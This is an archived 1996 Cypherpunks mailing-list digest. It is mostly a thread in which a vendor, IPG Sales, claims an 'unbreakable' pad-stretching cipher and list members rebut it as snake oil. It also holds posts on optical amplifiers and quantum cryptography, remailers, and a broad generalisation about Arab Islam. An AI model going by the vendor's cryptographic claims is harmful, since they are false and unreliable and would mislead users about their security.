> > Date: Mon, 19 Feb 1996 17:17:52 -0600 (CST)
> > From: IPG Sales <ipgsales@cyberstation.net>
> 
> > We are not currently revealing all the details of our system because of 
> > patents in process, and other relat6ed matters. We are offering the 
> > software. You should be able to readily decompile it and determine the 
> > algorithms used andf how they are used to generate random number sequences 
> > for very long files.  For short messages, a true OTP is used directly. 
> 
> Marketing Fluff - read "we don't *want* to revel it".  Patent stuff doesn't
> take long to get the initial disclosures filed.  Cypherpunks are 
> generally engineers and are immune to such crap.  

You must also then know that you do not always get what you want with a 
pent - sometimes you do not get anything, or not enough to cover you. 
Until we know, we are reating much of the material as trade secrets, as 
we are sure you would also do. Once, you discover how simple the system 
is to install, use, update, and add to, you will understand our concern.

> 
> > If you are aware of encrtypting technology, you recognize that hardware 
> > prime number cycle wheels for the basis of some of the most secured 
> > hardware systems employed for encryption. We simply expand that technogy 
> > using software to set an intial setting, an adder, and a limit for 64 
> > such wheels, using large random prime numbers for each of those settings. 
> > The total number of possibilities is over 10 to the 1690th power and can 
> > be much larger. 
> 
> So.  Large "random" prime numbers are generated.  From what?  How?
> Obviously these act as keys to your "OTP".  Figure out how to 
> match this prime and you can generate the same "OTP".
> 
The hardware  OTP is used as a template to 

> > Thus we can eliminate the need to have the length of the OTP to be equal 
> > to the length of the file - if you do not belive that it works, try it 
> > and see - it takes inly a few hours to set such a trial up. We generated 
> > over 790 gigabytes of charcaters, on multiple backups, and tested. Our 
> > standard deviations, chi squares, Delta ICs for bits, characters, sets, 
> > and the entire set were random. The sets are random, and you can take 
> > that to the bank. 
> 
> So the data coming out appears random.  Big whoopie.  Lots of algorithms
> can generate the same thing.

Starting with an OTP as seed? The algorithm may be fixed in a sense, but 
it employs a truse hardware random OTP to select intial settings, adds, 
and limits, so every one is new and unique - a lot of algorithnms can 
generate pseudfo trandom numbers, but onece you knw the algorithm, you 
can generate the random sequence. Our system does not do that - in 
oReder to solve the system, you must know what OTP was used, that is what 
was the true hardware generated OTP. Unless you know what that was, 
knowing the algorithm does nothing for you. If you understand that 
principle you understand the system. 

> 
> The key is how do you seed that random number generator? 
> 
As explained above

> This isn't even close to being a OTP.  A OTP by definition has a random
> set of data that is transmitted to the receipient over a seperate
> secure channel from the actual message to be sent.  The actual message
> and the OTP are XOR'ed together and sent.  The receipient then XORs
> the OTP and the encrypted message to get plaintext.
> 
> That is pretty simple - even a marketing drone should be able to figure
> that one out.
Perhaps so, but our system does employ a true hardware generated OTP, and 
operates similiar to what you describe -  however, the important 
differernce is that we use a smal;l OTP to generate a larger OTP, like 
stringing the cable across the Golden Gate narrows. Just becuase we 
convert over from a full OTP to a prime number wheel system configured 
from the OTP doers not mnean that the result is not an OTP - in theory it 
is simple to break RSA systems, but factoring a 2048 bit number, or 4096 
number, or whatever, makes the problem enormous  - our system for large 
messages/files is similiar in difficult except that it is much nearer 
an 8192 bit number than 2048. The possibilities to be examined ar4e so 
large, that iot is not possible to solve then with a computer, even if 
all the particles in the iuniverse, all 10 to the 80 power of then were 
a Cray T3E, or better.  Furthermore, all you would get would be all the 
possiblilities which would be everything!


 > 
> Now - explain how (in generic terms) your system acts as a OTP.
> 
I believe that you have some basic grasp of OTPs, but obviously you do 
not understand how the Golden Gate Bride Cable was strung: A 
string, a rope, a small steel cable, all of the cables - we employ a 
similar technique to fdeliver the follow on OTPs. 
> > Someone, will decompile it and discover that it is truly random, at least 
> > from the practical usage basis. But we need that time to file patents, 
> > cvopyrights and the like. 
> 
> Yes - hopefully someone will take the time and money to decompile it.
> .... but if you are so sure of yourself,
> why not give away some demo copies.  Why not source of the security
> functions?  (Shove that patent crap someplace - you wouldn't be 
> selling it if your disclosures weren't already filed)
> 
> > The IPG system solves the key management problem and produces a truly 
> > unbreakabkle system. We make no apologies for not currently revealing all 
> > of the methodologies andf algorithms, but they will be revealed with 
> > time, by us or others, and you will discover that it is indeed a simple, 
> > easy to use, easy to install, truly unbreakable system.
> 
> "unbreakable" - Bullshit - you obviously don't know crap.
> 
Time will prove one of us wrong, and that wiill prove to be you - it is 
unbreakable as a thoprough examination of the literature will reveal.
 > Dan
> ------------------------------------------------------------------
> Dan Oelke                                  Alcatel Network Systems
> droelke@aud.alcatel.com                             Richardson, TX
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 20 Feb 1996 12:09:00 +0800
To: cypherpunks@toad.com
Subject: SOTP = Snake Oil Time Pad
Message-ID: <ad4e67770402100410b0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 PM 2/19/96, Mike McNally wrote:
>IPG Sales writes:
> > For short messages, a true OTP is used directly.
>
>Quick question: does anybody at IPG know what the "O" in "OTP" stands
>for?

I think it is "O for Oil," as in Snake Oil.

The view of some seems to be "We're selling Internet Security products
because that's where the money and the suckers are, and anything with
"Internet" and "Security" in it will mean a quick couple of million when we
take our company public."

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Tue, 20 Feb 1996 11:40:47 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602200101.UAA00472@jekyll.piermont.com>
Message-ID: <Pine.BSD/.3.91.960219190832.5326E-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry, 

I will not waste anymore of your time, or mine -
Since you seem to know everything about everything, 
there is no need in talking in circles - You may think that you know 
everything there is to know about encryption, but believe me, there is 
a lot more for you to learn - I do not now what KDC's are, I presume 
some sort o Key Delivery Codes. or Systems, but? I would like to find out 
though - send us some literature and we will send you a free demo system- that 
is the differece between you and us - we know very little and want to 
know more you know everythinh there is to know - and do not need to 
know anymore - 

Incidentally crypto wheel systems are stillemployed in 1996 at some of 
the highest levels of usage - some called then rotors at one time - they 
are still used because the produce non repeatable sequeces - the fact 
that ROMs are userd insteaed of rotors does not change the basic nature 
of such systems, they depend upon the generation of random, nonrepeatable 
sequences, which they can do, much faster and much more securely ythan 
RSA systems, I like RSA systems, they have application - but they are not 
the begin all and end all of encryption technology - good luck 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 20 Feb 1996 11:46:40 +0800
To: acg@mandrake.cen.ufl.edu
Subject: Re: Optical repeaters
Message-ID: <9602200124.AA09857@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> > > Optical
> > > repeaters have to pass your signal through an intermediate electronic
> > > stage anyway, since we have no purely optical valve/transistor
> > > equivalents (bosons don't interact with each other at all).
> 
> Dave Emery responds:
> > 	This is not true.   There is now a whole technology of optical
> > amplifiers for fiber communications systems that used Ettrium doped
> > fibers pumped with strong light from a laser at a slightly shorter
> > wavelength. These fiber optical amplifiers have gains in the order of
> > 10-12 db in a section of special doped fiber only about 10 feet long.
> 
> You're right, I do remember reading about these somewhere... didn't
> realize they were already in use.

Optical amplifiers -  they are in use all right.  Want to buy one?
My employer sells them.  (get out a big checkbook though -
gotta cover my salary ;-)

> Even so, I still don't think such a repeater would pass quantum-crypto
> signals, excepting any photons that happened to just "leak" directly
> through.  Your useful quantum state information resides in the
> individual photons originally sent, and any even the optical repeaters
> you describe achieve gain by by gating in *more* photons under the
> incoming signal's control.  In so doing it will collapse the
> wavefunctions of these incoming photons.
> 
> Not to say repeaters on the line aren't possible, but they'll have to
> decode your data using a copy of the "secret" key, then re-encode for
> transmission... so this will be a potential break-in point and need
> good physical security.

This is essentially true for the purpose of quantum-crypto. 
The cascade of phontons triggered from the incoming photons would
mask most of your original phontons - necesitating a secure "repeater".


> > 	The current generation of undersea cables from the US to Europe
> > use these amplifiers instead of the more traditional regenerating
> > repeaters that convert the light to electronic signals, reclock the data
> > stream and convert it back to light with another laser diode.   There is
> > no conversion from light to digital electronic signals all the way from
> > Rhode Island to England - the same light pulses that go into the fiber
> > on one side of the Atlantic come out on the other end without ever
> > having been converted to electronic form in between.
> 
> You said power for the amps comes from a high-intensity,
> shorter-wavelength beam... can this be superimposed on the original
> signal at the point of origin, as with in-line coax-cable amplifiers?

Power for the amps must be electrical.  So, a seperate power cable must
be run seperate with the optical-fiber.  This normally isn't a problem
since the casing/etc of the fibers has lots of metal for protection anyways.

> > 	 These amplfiers have enourmous bandwidth, and can be used to
> > amplify several slightly different wavelengths of light allowing
> > wavelength division multiplexing of multiple streams of light flashes of
> > slightly different "colors" (all the current technology works at around
> > 1500 nm which is well into the infrared).   This can expand the capacity
> > of a single fiber to four to six times the 5 Gb/sec that is the current
> > state of the art.
> 
> Nice... :)
> 
Very nice! ;-)  Flouride based amplifiers should be able to handle up
to 16 channels.  Using state of the art time-multiplex stuff of 10 Gb/sec
gives a total throughput of 160 Gb/Sec.... smoking!

Of course the parts for all of this will set you pack a sizeable 
chunk of change.

If you want to see some further reading about optical amplifiers
as applied in a telephone network - find a copy of "Telephony" 
a trade rag.  There is an article by John Moss and ??? here at Alcatel
that explains stuff in high level terms.  (little to no physics stuff)

Dan

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 20 Feb 1996 14:26:42 +0800
To: perry@piermont.com
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <v02120d0bad4eea0ab532@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:01 2/19/96, Perry E. Metzger wrote:

>Are you refering to rotors, by any chance? Rotors are World War II era
>technology. Of course, who can even guess what you are talking
>about. You make about as much sense as the people handing out xeroxed
>pamphlets on the street corner informing all comers about the fact
>that they are being controlled by aliens.

I think what he means is that they use virtual rotors built out of very
long primes. I.e., write down n very long primes, one per line. Shift each
prime number by a the number of positions indicated in an m by n key. Pick
a column. Read the column top to bottom. Use the resulting number to xor
with your cleartext of lenght <= n. If the cleartext is > n, use the next
column(s) as well.

Just a guess.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 20 Feb 1996 12:36:34 +0800
To: cypherpunks@toad.com
Subject: Re: Optical repeaters
Message-ID: <ad4e69a8050210049454@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:45 AM 2/20/96, Alexandra Griffin wrote:

(about inline optical amplifiers/regenerators)

>You're right, I do remember reading about these somewhere... didn't
>realize they were already in use.
>
>Even so, I still don't think such a repeater would pass quantum-crypto
>signals, excepting any photons that happened to just "leak" directly
>through.  Your useful quantum state information resides in the
>individual photons originally sent, and any even the optical repeaters
>you describe achieve gain by by gating in *more* photons under the
>incoming signal's control.  In so doing it will collapse the
>wavefunctions of these incoming photons.

Given that a quantum cryptography system depends on *single photons* to
work, I'm not sure that talk of amplifification makes sense. Between source
and receiver, a photon either makes it or doesn't. If it makes it, it makes
it will its full "quanta" of energy, of course. If it doesn't make it, due
to tunnel-penetrating the walls of the fiber or scattering off an impurity
in the fiber, then it just doesn't make it, so no
amplification/regeneration is possible. (Regenerate _what_?)

But the quantum measurement issue, aside from the above, is an interesting one.

We have to be careful here (and I'm including myself, not just using the
royal "we"). It isn't clear to me that the amplification/regeneration
process counts as making a measurement, from some recent work I've read
(sorry, don't recall the references, but could be a recent issue of
"Scientific American"). In interference measurements, the wave function
collapses if individual photons are counted and recorded (whatever
"recorded" really means...) and the interference pattern vanishes. If the
photons are not counted and/or recorded, the pattern reappears.

By analogy, it is not clear to me that a simple regeneration mechanism,
with no local observer or recording apparatus, will collapse the wave
function. Seems to me an experiment may have already been done along these
lines: separate fibers producing an interference pattern and then these
inline amps added...if the interference pattern remains, as I would expect,
then the amps/regenerators did not constitute a "measurement" in QM terms.


--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wink Junior <winkjr@teleport.com>
Date: Tue, 20 Feb 1996 14:14:12 +0800
To: ipgsales@cyberstation.net (IPG Sales)
Subject: Re: Internet Privacy Guaranteed
In-Reply-To: <Pine.BSD/.3.91.960219183616.5326D-100000@citrine.cyberstation.net>
Message-ID: <199602200339.TAA17670@julie.teleport.com>
MIME-Version: 1.0
Content-Type: text


I've been reading the mish-mash of replies from "IPG Sales" and have been
trying to figure out exactly what it is they think they're doing.  Aside
from the crap about not revealing details due to patent-pending issues, but
claiming it's the same as a process that's been in use since 1966 (clue:
prior art == no patent) and an unwillingness to provide any names or
references for all this apart from mentioning Ms. Denning and Leyland's web
page, I think I've got something pieced together.  Perhaps IPG Sales will be
happy to tell me if I've got it right or not:

Step 1. 100 friends and I pay IPG $$$.

Step 2. IPG starts up a hardware-based random number generator, and spits out
	5066-bit chunks of random data to be used as OTPs.  Since each pair of
	friends needs unique data (wouldn't want them easedropping on our
	gossip about them), IPG will generate a large number of said chunks.
	The magic box remembers every chunk it's ever spewed and never, ever
	repeats itself.

Step 3. IPG's Kwality Kontrol Dept. will run a bunch of statistical tests on
	the chunks (did I see the standard entropy calculation in the list?)
	to make sure they look truly random.  Chunks failing the tests get
	tossed.

Step 4. IPG takes the surviving chunks and runs them through a "prime number
	cycle wheel" which is some kind of rotor system, with something like
	64 rotors, or perhaps 64 passes through an n-rotor system.  It produces
	primes, or works with primes, or somehow large random primes (can a
	prime truly be called "random) either come in, go out, or both.  Primes
	are involved here somehow.  In any case, whatever comes out is part of
	10^1690 (or from a previous message, 10^2330) possible results.  Why
	this matters I do not know.

Step 5. The results are somehow variable in length (?) or in some way
	eliminates the need for a OTP to be at least as large as the message
	to be encoded.  This has been claimed several times.  So somehow the
	original OTP chunk produces new pads of potentially infinite length?

Step 6. IPG mails out a lot of floppies to me and my 100 friends containing
	lots of these resultant things (which still sound like OTPs.)  I
	assume US Mail is completely trusted, data is never corrupted, disks
	are never lost or stolen, etc.

Step 7. These results act as OTPs (aka Nvelopes) that are used to encode
	the message.  My buddies use the matching chunks to decode the
	messages (aka Nvelopeners.)  The software system does all the work,
	and I don't have to do anything (much like public-key systems today.)

Err... okay, maybe I don't have this figured out.  Still sounds like OTPs,
and someone selling random data at $15 a pop per month.  Having multiple
floppies mailed to me monthly, with all the inherent difficulties, sounds
like a lot more work than public-key management.  My bozometer is pegged.

Looking forward to having my oversights corrected,
Wink

--
winkjr@teleport.com
"We offer freedom to the masses.  It's a tough fight -- I'll grant you that --
but we're brave.  We're well financed.  We believe that God is on our side."
						-- Netscape CEO James Barksdale




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alexandra Griffin <acg@mandrake.cen.ufl.edu>
Date: Tue, 20 Feb 1996 10:53:07 +0800
To: cypherpunks@toad.com
Subject: Optical repeaters
In-Reply-To: <9602190113.AA23991@pig.die.com>
Message-ID: <199602200045.TAA23358@mandrake.cen.ufl.edu>
MIME-Version: 1.0
Content-Type: text


I wrote:

> > Optical
> > repeaters have to pass your signal through an intermediate electronic
> > stage anyway, since we have no purely optical valve/transistor
> > equivalents (bosons don't interact with each other at all).

Dave Emery responds:
> 	This is not true.   There is now a whole technology of optical
> amplifiers for fiber communications systems that used Ettrium doped
> fibers pumped with strong light from a laser at a slightly shorter
> wavelength. These fiber optical amplifiers have gains in the order of
> 10-12 db in a section of special doped fiber only about 10 feet long.

You're right, I do remember reading about these somewhere... didn't
realize they were already in use.

Even so, I still don't think such a repeater would pass quantum-crypto
signals, excepting any photons that happened to just "leak" directly
through.  Your useful quantum state information resides in the
individual photons originally sent, and any even the optical repeaters
you describe achieve gain by by gating in *more* photons under the
incoming signal's control.  In so doing it will collapse the
wavefunctions of these incoming photons.

Not to say repeaters on the line aren't possible, but they'll have to
decode your data using a copy of the "secret" key, then re-encode for
transmission... so this will be a potential break-in point and need
good physical security.

> 	The current generation of undersea cables from the US to Europe
> use these amplifiers instead of the more traditional regenerating
> repeaters that convert the light to electronic signals, reclock the data
> stream and convert it back to light with another laser diode.   There is
> no conversion from light to digital electronic signals all the way from
> Rhode Island to England - the same light pulses that go into the fiber
> on one side of the Atlantic come out on the other end without ever
> having been converted to electronic form in between.

You said power for the amps comes from a high-intensity,
shorter-wavelength beam... can this be superimposed on the original
signal at the point of origin, as with in-line coax-cable amplifiers?

> 	 These amplfiers have enourmous bandwidth, and can be used to
> amplify several slightly different wavelengths of light allowing
> wavelength division multiplexing of multiple streams of light flashes of
> slightly different "colors" (all the current technology works at around
> 1500 nm which is well into the infrared).   This can expand the capacity
> of a single fiber to four to six times the 5 Gb/sec that is the current
> state of the art.

Nice... :)

- alex




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Tue, 20 Feb 1996 12:13:28 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <199602200137.UAA02295@jekyll.piermont.com>
Message-ID: <Pine.BSD/.3.91.960219194257.5326J@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry

Yes you are quite right - time will tell and it is you that is wrong - as 
time will prove - it will be my pleasure to have you eventually choke on 
your castigating words - to castigate be sure that you are right, and in 
this case, you are wrong as time will tell - wait and see -!!!!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 20 Feb 1996 13:20:16 +0800
To: IPG Sales <droelke@rdxsunhost.aud.alcatel.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
Message-ID: <v02120d0cad4ef104589f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 19:05 2/19/96, IPG Sales wrote:

>Perhaps so, but our system does employ a true hardware generated OTP, and
>operates similiar to what you describe -  however, the important
>differernce is that we use a smal;l OTP to generate a larger OTP, like
>stringing the cable across the Golden Gate narrows.

Somebody please hand the guy a textbook on information theory. The entropy
of your "larger OTP" *can not* be greater than the entropy of your original
OTP. You are suspending Golden Gate Bridge by a string. Anybody using it
does so at their peril.

Side note: why do these snake oil salesmen tend to have such horrible
spelling? Let me guess. Because they design their software with the same
care they use to compose their posts?


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 20 Feb 1996 11:12:34 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960219181128.5326C-100000@citrine.cyberstation.net>
Message-ID: <199602200101.UAA00472@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



IPG Sales writes:
> > Once you have applied for the patent you no longer need be
> > secret -- indeed, you can still apply for a patent up to one year
> > after full publication.

>True, but we are not sure what is going to be covered by patents,
>obviously you must know that wemay have to treat some of the
>information, maybe all of the really iomportant stuff as trad secret
>material

If you make any of your work at all trade secrets your entire system
is totally unacceptable to any real client with real security
needs. No rational security person is willing to accept the words of
snake oil salesmen -- like yourselves -- on faith.

> In time they will, because keymanagem,ent makes RSA systems unmanageable
> for large organizations - offer such a suystem to Merrill Lynch and be
> laughed out of the office - only a syustem such as ours resolve that
> problem!

You are the ones that are going to get laughed out of places, except
for the offices of the ignorant and gullible, whom you might prey
on. You should be ashamed to even dare to put it on the market. You
are committing nothing less than fraud, in all likelyhood.

You system resolves no key management problems because at this point
-- sight unseen -- I'm almost sure it is a piece of junk. You are
putting out too many "this is crap" keywords for me to think
otherwise. However, let me point out that you guys also don't know
what you are talking about. There is no key management problem per
se. RSA based systems are quite easy to use.

Even private key systems are quite workable. I actually work with
these firms -- its what I do for a living. They have existing systems
based on KDCs (do you even know what a KDC is?) and they function just
fine. As for public key technologies, they are in many cases
implementing technologies based on public key system. The only people
that are going to be laughed out are you guys. You are obviously the
worst kind of snake oil salesmen.

> > > If you are aware of encrtypting technology, you recognize that hardware
> > > prime number cycle wheels for the basis of some of the most secured
> > > hardware systems employed for encryption.
> 
> Please refer to Dorthy Dennings excellent work on mathematical
> crytanalysis of wheeeled cryptosystems,

Are you refering to rotors, by any chance? Rotors are World War II era
technology. Of course, who can even guess what you are talking
about. You make about as much sense as the people handing out xeroxed
pamphlets on the street corner informing all comers about the fact
that they are being controlled by aliens.

> > > The total number of possibilities is over 10 to the 1690th power and can
> > > be much larger.=
> >
> > Spare us the bull. You don't get security in a crypto system from
> > having impressive combinatorial explosions. A simple monoalphabetic
> > substitution can claim to have 403291461126605635584000000 possible
> > keys and you wouldn't trust your six year old cousin not to crack
> > it. (the number would be far, far more impressive if I'd taken all
> > ASCII characters instead of just the alphabet of 26 letters in to
> > account).

> Who in the world said it was monalpabetic substitution -

I didn't. I just said that impressive numbers are meaningless. A
simple repeating Vigenere cipher's key can easily have more than
10^1690 possible keys and yet be crackable with no trouble at
all. Sheer number of combinations is meaningless. Big numbers are
meaningless. If you understood cryptography, my point would have been
obvious. You don't understand technology.

> we are talking
> about the random sequences for a single message - A random prime number
> wheel system, provides a far more secure system that RSA based systesms,

The first part of your comment is meaningless. The second part implies
that you know how to break RSA public key cryptography. Please
enlighten us as to how.

> - check it out, and do some investigating instead of talking.

You won't allow anyone to do any investigating on your methods since
you keep them secret.

You should be ashamed. Luckily, no one is going to buy your products,
especially not once the crypto community is finished with you.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant <wlkngowl@unix.asb.com>
Date: Tue, 20 Feb 1996 11:33:12 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers not heard from; info?
Message-ID: <199602200105.UAA04147@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The c2 remailers always bounce from full disks for the last couple of 
months when I've tried to use them.  I've had problems with amnesia as 
well.

I've noticed some that allegedly allow replacement of subject do not.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSkeaSoZzwIn1bdtAQF1YAF8DQDN1BnrJ0DU5Vp3Ac9Z8id91UGurocG
kAyHUUEnMXD2eFa1K4PPI+VCrFQBFKgs
=pC+m
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant <wlkngowl@unix.asb.com>
Date: Tue, 20 Feb 1996 11:32:59 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers not heard from; info?
Message-ID: <199602200108.UAA04164@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I think it would be better to use some commands indicating the start
and end of the messages...

::begin-body

[message goes here]

::end-body
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSke8ioZzwIn1bdtAQEQBgGAq91bmP74lyy4PIiTrZmYkg3zDBbt3Ke/
fLcVQNmXFZuYR5s5FkfX9DKLmY3Vkg1v
=jI5z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 20 Feb 1996 12:05:06 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960219190832.5326E-100000@citrine.cyberstation.net>
Message-ID: <199602200137.UAA02295@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



IPG Sales writes:
> there is no need in talking in circles - You may think that you know
> everything there is to know about encryption, but believe me, there is
> a lot more for you to learn - I do not now what KDC's are,

Key Distribution Centers, the center of Needham-Schroeder and similar
key management protocols, like the Kerberos protocols. If you don't
know what these are, you have no business talking about the "problems
of key management" because you know nothing about the field of key
management.

> that is the differece between you and us - we know very little and
> want to know more you know everythinh there is to know - and do not
> need to know anymore

The difference between us is that you are pretending to be a doctor
even though you have no medical training and are about to go out and
butcher live patients, pretending that this is just business as
usual. Some of the rest of us have devoted many years to the study of
this field, which actually does have a substantial literature and lots
of skilled professionals. Anyone who says "We know very little" has no
business writing code and selling it to the public. You are doing
nothing less than putting your customers businesses at risk, and in
some cases their lives. You deserve the worst.

> I will not waste anymore of your time, or mine -

Don't worry. Whether we waste any of your time or not, I assure you
that people like me *will* lay waste to your company and its sales if
you are indeed peddling junk, which is the most obvious assumption to
make here. I personally am sick of companies such as yours pulling the
big con on ignorant customers. You have not heard the last of any of
this -- believe me. If the lot of you end up convicted of fraud it
will not surprise me. I repeat -- you have NOT heard the last of
this. As I said, I'm a libertarian. I believe it is up to the
community, not the government, to track down and stop the activities
of glorified con men such as yourselves. You *will* be stopped.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Tue, 20 Feb 1996 06:11:18 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Online Zakat Payment: Religious tithe.
In-Reply-To: <Pine.SV4.3.91.960219004945.7650A-100000@larry.infi.net>
Message-ID: <Pine.SUN.3.91.960219203150.24154F-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Alan,

I agree that I was looking at *Arabic* Islam, in which specific bad
features of Arabic culture have congealed with the religion.  It is as if
I were to judge Christianity solely by reference to the Spanish Inquisition.

However, this being said, it is presently true that Arab Islam is the 
most important single strand.  It may be that the softer oriental 
versions will gradually take over.  If so, this is to be desired.  
Indeed, so far as we can, we should even encourage this.  In the 
meantime, though, I think it wise to be aware of the nastiness of much 
actually existing Islam, and to challenge any claims that its devotees 
may make to moral superiority over our own civilisation.  I think I was 
too harsh in my postings of last week.  But I stand by my dislike of the 
Islam that I most often see.

Yours ever,

Sean.

PS	I seem to be breaking my self-denying ordinance about postings on 
Islam to the list.  But this I suppose only confirms Tallpaul's doubts 
regarding the honour and consistency of libertarians!

On Mon, 19 Feb 1996, Alan Horowitz wrote:

> Sean,
> 
> Women's place in Islam is just fine. The problem is that _Arabs_ like to 
> define their ages-old cultural suppression of woman as Islamic. Which it is
> not.
> 
> YOu in England are dealing with an unrepresentative sample of the Islamic 
> world. May I suggest a few weeks of traveling through Java and Mindanao, 
> to see another side of the coin.
> 
> The crusaders liked to define their thuggery and thievery in the Balkans 
> and middle East as being driven by Christian imperatives. Should we say 
> that the Crusader's *actions* were a good definition of "christian 
> principles"?
> 
> Alan Horowitz
> alanh@norfolk.infi.net
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Tue, 20 Feb 1996 14:51:17 +0800
To: cypherpunks@toad.com
Subject: Optical repeaters
Message-ID: <199602200501.VAA10510@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



You should be able to use optical repeaters in a quantum cryptography situation.
The way lasers (these optical repeaters are lasers) amplify is that a photon
can stimulate the emission of an identical (in all respects) photon from an
excited atom as it goes by.  So you get two photons, with exactly the same
direction, frequency, polarization, and so on; without measuring those states.
This is how lasers work.

But, and this is the interesting part; you cannot use this feature to tap
the line.  Measuring either one of these photons would disturb the other,
destroying the state that it has.

It has been proven over and over that you cannot measure the polarization of
a photon in two axes at the same time, the measurment at one axis destroys
that information.  So you think, "Fine, I'll just stimulate the emission of
an identical photon, and measure one horizontally and one vertically. 
I'm only measuring each photon once, but since I know that the two photons
are identical, I can deduce the polarization in both axes of the one photon
from these two measurements."  Makes sense.  Doesn't work.  There was a
fabulous article in Scientific American, I think August 1978 that described
almost exactly this experiment.  You can think about it a number of different
ways, but the upshot is that you cannot defeat quantum cryptography this way,
the uncertainty principle will not let you.

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Technology Development                   408) 286-3376
   Hammerhead Productions        http://www.got.net/~thad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Murphy <packrat@ratbox.rattus.uwa.edu.au>
Date: Mon, 19 Feb 1996 22:32:16 +0800
To: cypherpunks@toad.com
Subject: Re: Piracy Bests ITAR
In-Reply-To: <199602190657.BAA00505@bb.hks.net>
Message-ID: <199602191326.VAA00595@ratbox.rattus.uwa.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


In message <199602190657.BAA00505@bb.hks.net>, 
  Mutant wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Alan Horowitz wrote:
> >    Yes, when Mr Anon travels to a beach in Jamaica or in Mombasa, he
